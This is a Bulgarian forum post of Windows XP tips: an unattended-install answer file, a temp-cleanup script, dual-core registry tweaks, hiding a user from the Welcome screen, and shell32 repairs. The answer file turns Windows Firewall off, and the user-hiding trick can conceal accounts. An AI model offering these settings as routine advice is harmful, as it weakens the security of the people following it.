     UserLocale=0402
     InputLocale=0409:00000409,0402:00000402
[Branding]
     BrandIEUsingUnattended=Yes
[URL]
     Home_Page=about:blank
[Proxy]
     Proxy_Enable=0
     Use_Same_Proxy=0
[Identification]
     JoinWorkgroup=WORKGROUP
[Networking]
     InstallDefaultComponents=Yes
[WindowsFirewall]
Profiles = WindowsFirewall.TurnOffFirewall
[WindowsFirewall.TurnOffFirewall]
     Mode = 0
[Shell]
     DefaultStartPanelOff = Yes
     DefaultThemesOff = Yes
[GuiRunOnce]
     Command0="%systemdrive%installstart.cmd"


П.П. Могат да се добавят и още неща. Като ми се наложи нещо след това го добавям към следващата версия на диска. Използвам RW. Последно добавих RAID драйвери, но още не ми се е налагал тест. Може да направя отделна тема за създаване на инсталационен диск, тъй като не намерих такaва, а някои от настройките са специфични.[/quote]
____________________________________________________________
UPDATE 11.03.2008
Малко скриптче което трие всичко в "documents and settings" "Users" Local settings >Temp и "Temporaty internet Files"
Скрипта работи за всички потребители в Documents and settings .Естествено трябва да имате и права за изпълнение на скриптове
Скрипта работи за Windows Xp,NT без Windows Vista -за него трябва малка модификация в bat файла.Който иска нека я направи -тя е елементарна
Ето и скрипта

http://maloumen.data.bg/deltemp.bat


Код

---------------------------------------
      Deleted files = C:deletedfiles.txt
      Log File = C:fordel.txt
      To "arm" script type "deltemp.bat y"
---------------------------------------


Скрипта се стартра с deltemp.bat y

____________________________________________________________
Оптимизация за рационално използване на двете ядра на двуядрени процесори:
I. Осъвременяване на операционната система:
1. Инсталирайте драйверите за новите процесори на АМD. *
2. Рестартирайте. **
3. Инсталирайте WindowsXP-KB896256-v4-x86-ENU.exe.
4. Рестартирайте.

II. Настройки в системния регистър:

1. Щракнете върху Start (Старт), изберете Run (Изпълни), въведете regedit и натиснете OK.
2. С десния бутон на мишката щракнете върху HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager, насочете мишката към New (Нов) и щракнете върху Key (Ключ).
3. Въведете Throttle в полето за име на новия ключ.
4. с десния бутон на мишката щракнете върху Throttle, насочете мишката към New (Нова) и щракнете върху DWORD Value (DWORD стойност).
5. Въведете PerfEnablePackageIdle в полето за име на стойността.
6. Щракнете с десния бутон на мишката върху PerfEnablePackageIdle и изберете Modify (Модифицирай).
7. В полето Value data (Данни за стойността) въведете "1". Уверете се, че е избрана стойност Hexadecimal (Шестнадесетична) в диалоговия прозорец Edit DWORD Value (Редактиране на DWORD стойността), след което натиснете OK.
8. Затворете редактора на системния регистър.
9. Рестартирайте.

III. Настройка в boot.ini:

1. Добавете ключ "/usepmtimer" за желаната операционна система.
2. Запазете промените.
3. Рестартирайте.

Забележка: Ако сте с Intel-базирана платформа пропуснете "*" и "**".

ВСИЧКО НЕОБХОДИМО ТУК:

http://store3.data.bg/rustyblade/DUAL-CORE%20OPTIMIZATION/[/quote]

Update 29.04.2008г

____________________________________________________________
Q:Как се скрива потребител от Welcome screen-a
A:
Начин през регистри едитор-а
start>run>regeditНамираме следния ключ

Код

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionWi
nlogonSpecialAccountsUserListРешаваме да скрием потребител Bob
Добавяме
DWORD който съвпада с нашето потребителско име Bob и е със стойност 1
Друг по лесен вариант е с тази програмка

http://ftp.intelliadmin.com/XPUserHide.exe


Стойност "1" скрива потребителя а стойност "0" го показва на Welcome screen-a

____________________________________________________________
Вадене на иконката Show my Dekstop долу в лентата ако липсва

Код

start>run>cmd>regsvr32 /n /i:U shell32.dll____________________________________________________________
Възстановка на start menu , имах някакви гниди и го бяха поомазали :

Код

regsvr32 /i shell32.dllПовечето функции и команди работят и на други операционни системи от NT тип.

Уебсайт в alle.bg